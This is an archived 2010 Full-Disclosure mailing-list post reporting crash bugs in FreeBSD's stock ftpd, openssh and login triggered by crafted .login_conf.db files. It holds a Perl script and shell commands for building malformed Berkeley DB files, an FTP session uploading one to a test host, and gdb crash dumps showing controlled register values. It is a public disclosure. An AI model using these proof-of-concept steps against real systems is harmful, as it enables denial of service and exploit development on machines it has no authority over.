| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 10 Aug 2010 04:11:46 +0200
From: "HI-TECH ." <isowarez.isowarez.isowarez@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: FreeBSD stock ftpd vulnerabilities (and more)
FreeBSD stock ftpd vulnerabilities (and more)
Currently this is crash only.
Also see the attachment.
More at @ http://isowarez.de/ lewls
Cheers /Kingcope
.login_conf.db vulnerabilities (FreeBSD Berkeley DB 1.85)
affects stock ftpd, openssh, /usr/bin/login
-----------------------------------------------------------
perl program to create the .db files and play with:
use DB_File;
my $db = tie %hash, 'DB_File', "test.db", O_CREAT | O_TRUNC | O_RDWR,
DEFFILEMODE, $DB_HASH ;
$a = "A" x 10100;
$db->put("test", "$a");
$db->sync();
$db->fd();
------------------------------------------------------------------------------------------------------------------
one db file was created using OpenBSD like so:
perl -e 'print "me:\\\n:" . "A" x 100000 . "=" . "A:"' > .login_conf
then using vi put a tab before the :AAAA...A's after the me:\n
then do:
cap_mkdb .login_conf
you cannot use freebsdĀ“s cap_mkdb because it has a strcpy buffer overflow
when parsing this file, OpenBSD does not :>
------------------------------------------------------------------------------------------------------------------
%uname -a;
FreeBSD r00tbox0wned.Belkin 6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16
04:18:52 UTC 2008
root@...sler.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
i386
.login_conf_suspect.db
C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
ftp> bin
200 Type set to I.
ftp> put Desktop/.login_conf_suspect.db .login_conf.db
200 PORT command successful.
150 Opening BINARY mode data connection for '.login_conf.db'.
226 Transfer complete.
ftp: 180224 bytes sent in 0,04Seconds 4870,92Kbytes/sec.
ftp> quit
221 Goodbye.
C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:
Connection closed by remote host.
C:\Users\Niko>ftp 192.168.2.19
Connected to 192.168.2.19.
220 r00tbox0wned.Belkin FTP server (Version 6.00LS) ready.
User (192.168.2.19:(none)): kcope
331 Password required for kcope.
Password:
%gdb /usr/libexec/ftpd
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...
(gdb) attach 668
Attaching to program: /usr/libexec/ftpd, process 668
Reading symbols from /lib/libutil.so.5...done.
Loaded symbols for /lib/libutil.so.5
Reading symbols from /lib/libcrypt.so.3...done.
Loaded symbols for /lib/libcrypt.so.3
Reading symbols from /usr/lib/libopie.so.4...done.
Loaded symbols for /usr/lib/libopie.so.4
Reading symbols from /lib/libmd.so.3...done.
Loaded symbols for /lib/libmd.so.3
Reading symbols from /lib/libm.so.4...done.
Loaded symbols for /lib/libm.so.4
Reading symbols from /usr/lib/libpam.so.3...done.
Loaded symbols for /usr/lib/libpam.so.3
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /libexec/ld-elf.so.1...done.
Loaded symbols for /libexec/ld-elf.so.1
0x281a4b1d in read () at read.S:2
2 RSYSCALL(read)
Current language: auto; currently asm
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x28192463 in collect_data (hashp=0x8061400, bufp=0x805f400, len=44900,
set=0)
at /var/src/lib/libc/db/hash/hash_bigkey.c:492
492 xbp = __get_buf(hashp, bp[bp[0] - 1], bufp, 0);
Current language: auto; currently c
(gdb) i r
eax 0xffff 65535 < OUR VALUE
ecx 0x0 0
edx 0xffff1001 -61439
ebx 0x281b4960 672876896
esp 0xbfbfc228 0xbfbfc228
ebp 0xbfbfc258 0xbfbfc258
esi 0x8061400 134616064
edi 0x8088000 134774784
eip 0x28192463 0x28192463
eflags 0x10286 66182
cs 0x33 51
ss 0x3b 59
ds 0x3b 59
es 0x3b 59
fs 0x3b 59
gs 0x1b 27
(gdb)
(gdb) x/10i $eip
0x28192463 <collect_data+71>: movzwl 0xfffffffe(%edi,%eax,2),%eax
0x28192468 <collect_data+76>: push %eax
0x28192469 <collect_data+77>: push %esi
0x2819246a <collect_data+78>: call 0x2810007c <_init+148>
0x2819246f <collect_data+83>: add $0x10,%esp
0x28192472 <collect_data+86>: test %eax,%eax
0x28192474 <collect_data+88>: mov %eax,%edx
0x28192476 <collect_data+90>: je 0x28192594 <collect_data+376>
0x2819247c <collect_data+96>: sub $0x8,%esp
0x2819247f <collect_data+99>: pushl 0xc(%ebp)
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfc260:
eip = 0x28192463 in collect_data
(/var/src/lib/libc/db/hash/hash_bigkey.c:492); saved eip 0x28192490
called by frame at 0xbfbfc2a0
source language c.
Arglist at 0xbfbfc258, args: hashp=0x8061400, bufp=0x805f400, len=44900,
set=0
Locals at 0xbfbfc258, Previous frame's sp is 0xbfbfc260
Saved registers:
ebx at 0xbfbfc24c, ebp at 0xbfbfc258, esi at 0xbfbfc250, edi at
0xbfbfc254,
eip at 0xbfbfc25c
(gdb)
---------------------------------------------------------------------------------------
__getbuf_crash_suspicious.db
%gdb /usr/libexec/ftpd
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...
(gdb) attach 680
Attaching to program: /usr/libexec/ftpd, process 680
Reading symbols from /lib/libutil.so.5...done.
Loaded symbols for /lib/libutil.so.5
Reading symbols from /lib/libcrypt.so.3...done.
Loaded symbols for /lib/libcrypt.so.3
Reading symbols from /usr/lib/libopie.so.4...done.
Loaded symbols for /usr/lib/libopie.so.4
Reading symbols from /lib/libmd.so.3...done.
Loaded symbols for /lib/libmd.so.3
Reading symbols from /lib/libm.so.4...done.
Loaded symbols for /lib/libm.so.4
Reading symbols from /usr/lib/libpam.so.3...done.
Loaded symbols for /usr/lib/libpam.so.3
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /libexec/ld-elf.so.1...done.
Loaded symbols for /libexec/ld-elf.so.1
0x281a4b1d in read () at read.S:2
2 RSYSCALL(read)
Current language: auto; currently asm
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
memcpy () at /var/src/lib/libc/i386/string/bcopy.S:79
79 rep
(gdb)
Program received signal SIGSEGV, Segmentation fault.
memcpy () at /var/src/lib/libc/i386/string/bcopy.S:79
79 rep
(gdb) i r
eax 0x5ff82 393090
ecx 0x3 3
edx 0x3 3
ebx 0x281b4960 672876896
esp 0xbfbfc544 0xbfbfc544
ebp 0xbfbfc578 0xbfbfc578
esi 0x28096348 671703880
edi 0x5ff82 393090
eip 0x281a436d 0x281a436d
eflags 0x10206 66054
cs 0x33 51
ss 0x3b 59
ds 0x3b 59
es 0x3b 59
fs 0x3b 59
gs 0x1b 27
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfc550:
eip = 0x281a436d in memcpy (/var/src/lib/libc/i386/string/bcopy.S:79);
saved eip 0x281869fe
called by frame at 0xbfbfc580
source language asm.
Arglist at 0xbfbfc548, args:
Locals at 0xbfbfc548, Previous frame's sp is 0xbfbfc550
Saved registers:
esi at 0xbfbfc544, edi at 0xbfbfc540, eip at 0xbfbfc54c
(gdb)
(gdb) x/10i $eip
0x281a436d <memcpy+37>: repz movsb %ds:(%esi),%es:(%edi)
0x281a436f <memcpy+39>: pop %edi
0x281a4370 <memcpy+40>: pop %esi
0x281a4371 <memcpy+41>: ret
0x281a4372 <memcpy+42>: add %ecx,%edi
0x281a4374 <memcpy+44>: add %ecx,%esi
0x281a4376 <memcpy+46>: std
0x281a4377 <memcpy+47>: mov %ecx,%edx
0x281a4379 <memcpy+49>: and $0x3,%ecx
0x281a437c <memcpy+52>: dec %edi
(gdb)
---------------------------------------------------------------------------------------
cgetent_crash_suspicious.db
looks like this is outside of the Berkeley DB 1.85 code.
localhost# uname -a;
FreeBSD localhost.Belkin 4.9-RELEASE FreeBSD 4.9-RELEASE #0: Mon Oct 27
17:51:09 GMT 2003
root@...ebsd-stable.sentex.ca:/usr/obj/usr/src/sys/GENERIC
i386
doesnt work on 6.3
localhost# ps aux | grep ftpd
root 161 0.0 0.3 1016 344 p0 R+ 9:04PM 0:00.01 grep ftpd
root 150 0.0 0.9 1420 1088 ?? Is 9:03PM 0:00.02 ftpd:
192.168.2.15
localhost# gdb /usr/libexec/ftpd
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) attach 150
Attaching to program: /usr/libexec/ftpd, process 150
Reading symbols from /usr/lib/libskey.so.2...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libmd.so.2...(no debugging symbols
found)...done.
Reading symbols from /usr/lib/libcrypt.so.2...(no debugging symbols
found)...
done.
Reading symbols from /usr/lib/libutil.so.3...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libm.so.2...(no debugging symbols
found)...done.
Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libc.so.4...(no debugging symbols
found)...done.
Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols
found)...
done.
0x28146c44 in read () from /usr/lib/libc.so.4
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x2810da81 in cgetent () from /usr/lib/libc.so.4
(gdb) i r
eax 0x0 0
ecx 0xfffffff3 -13
edx 0x807cff4 134729716
ebx 0x281522ec 672473836
esp 0xbfbfdf08 0xbfbfdf08
ebp 0xbfbfe480 0xbfbfe480
esi 0xbfbfe380 -1077943424
edi 0x807d000 134729728
eip 0x2810da81 0x2810da81
eflags 0x10246 66118
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb) x/10i $eip
0x2810da81 <cgetent+513>: repnz scas %es:(%edi),%al
0x2810da83 <cgetent+515>: mov %ecx,%esi
0x2810da85 <cgetent+517>: not %esi
0x2810da87 <cgetent+519>: lea 0xffffffff(%esi),%edx
0x2810da8a <cgetent+522>: mov %edx,0xfffffad4(%ebp)
0x2810da90 <cgetent+528>: add $0xfffffff4,%esp
0x2810da93 <cgetent+531>: push %esi
0x2810da94 <cgetent+532>: call 0x280dd8a4 <_init+2316>
0x2810da99 <cgetent+537>: mov %eax,%edi
0x2810da9b <cgetent+539>: add $0xfffffffc,%esp
(gdb)
(gdb) i f
Stack level 0, frame at 0xbfbfe480:
eip = 0x2810da81 in cgetent; saved eip 0x2810d8ae
called by frame at 0xbfbfe4c0
Arglist at 0xbfbfe480, args:
Locals at 0xbfbfe480, Previous frame's sp is 0x0
Saved registers:
ebx at 0xbfbfe468, ebp at 0xbfbfe480, eip at 0xbfbfe484
(gdb)
I am sure there are more places where it might crash. Just modify the values
of the .db files in
a hex editor and check it out.
Content of type "text/html" skipped
Download attachment "FreeBSD.zip" of type "application/zip" (4560 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists